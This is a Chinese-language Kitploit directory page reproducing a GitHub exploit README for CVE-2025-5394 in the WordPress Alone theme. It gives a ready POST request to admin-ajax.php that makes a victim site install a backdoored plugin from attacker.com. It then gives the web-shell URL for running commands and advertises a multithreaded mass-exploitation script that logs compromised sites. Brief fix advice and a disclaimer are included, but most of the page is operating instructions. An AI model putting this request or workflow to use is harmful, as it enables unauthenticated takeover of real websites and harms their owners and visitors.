Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-5394 — Alone – 慈善多用途非营利 WordPress 主题 <= 7.8.3 - 缺失授权导致通过插件安装实现未认证的任意文件上传 | Kitploit
工具/GitHubGitHub/yucaerin/cve-2025-5394
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubyucaerin/cve-2025-5394

CVE-2025-5394

Alone – 慈善多用途非营利 WordPress 主题 <= 7.8.3 - 缺失授权导致通过插件安装实现未认证的任意文件上传

查看仓库
1311年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-5394 – WordPress Alone 主题 <= 7.8.3 - 通过插件安装实现未认证任意文件上传

🔥 漏洞概述
WordPress 主题 Alone 版本 <= 7.8.3 存在未认证任意文件上传漏洞。该缺陷允许未认证攻击者通过一个未受保护的 AJAX 端点从远程 URL 上传并安装任意插件 ZIP 文件——从而通过部署后门插件实现远程代码执行(RCE)。

该漏洞源于 beplus_import_pack_install_plugin 函数,该函数通过 wp_ajax_nopriv_ 公开暴露,且没有任何身份验证或权限检查。该函数会从用户提供的 URL 安装并激活插件。

🔍 受影响主题

  • 主题名称: Alone – 慈善多用途非营利 WordPress 主题
  • 受影响版本: <= 7.8.3
  • 漏洞类型: 未认证任意文件上传 → RCE
  • CVE ID: CVE-2025-5394
  • CVSS 评分: 9.8(严重)
  • 影响: 完全远程代码执行(RCE)和站点完全沦陷

🧪 漏洞利用功能

  • 🔓 无需身份验证
  • 📦 直接从远程 URL 上传恶意插件 ZIP
  • 🚀 自动安装并激活插件
  • 🐚 支持通过插件中嵌入的 PHP 进行 Webshell 投递
  • ✅ AJAX 端点对未认证用户可访问: /wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin

🧠 研究人员

  • 致谢: Thai An

🚀 使用方法

  1. 准备一个托管在你控制的服务器上的恶意插件 ZIP 文件。

    • 必须包含有效的插件头(Plugin Name:)和 PHP 后门(例如 bk.php)
  2. 构造以下 POST 请求:

    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: victim.com
    Content-Type: application/x-www-form-urlencoded
    
    action=beplus_import_pack_install_plugin&
    data[plugin_slug]=hello-dolly&
    data[plugin_source]=https://attacker.com/hello-dolly.zip
    
  3. 如果成功,插件将被安装并激活。通过以下地址访问你的 shell:

    root@kitploit:~
    https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
    

🧰 批量利用脚本 本仓库包含一个批量利用工具,具有以下功能:

  • 多线程处理
  • 自动添加 HTTPS 前缀(如果缺失)
  • 将成功目标实时记录到 result.txt

详见 mass_beplus_exploit.py。

🛠 修复建议

  • 主题作者应移除或保护 wp_ajax_nopriv_beplus_import_pack_install_plugin 钩子。
  • 实施身份验证/权限检查(例如 current_user_can('install_plugins'))
  • 验证并限制插件来源。
  • 使用 Web 应用防火墙(WAF)阻止未经授权的 admin-ajax 访问。

🔒 免责声明:
此信息仅用于教育和授权安全测试目的。未经授权访问或使用计算机系统是非法且不道德的。

📚 参考资料:

  • Wordfence 公告 – CVE-2025-5394

CVE: CVE-2025-5394
研究人员: Thai An

下载工具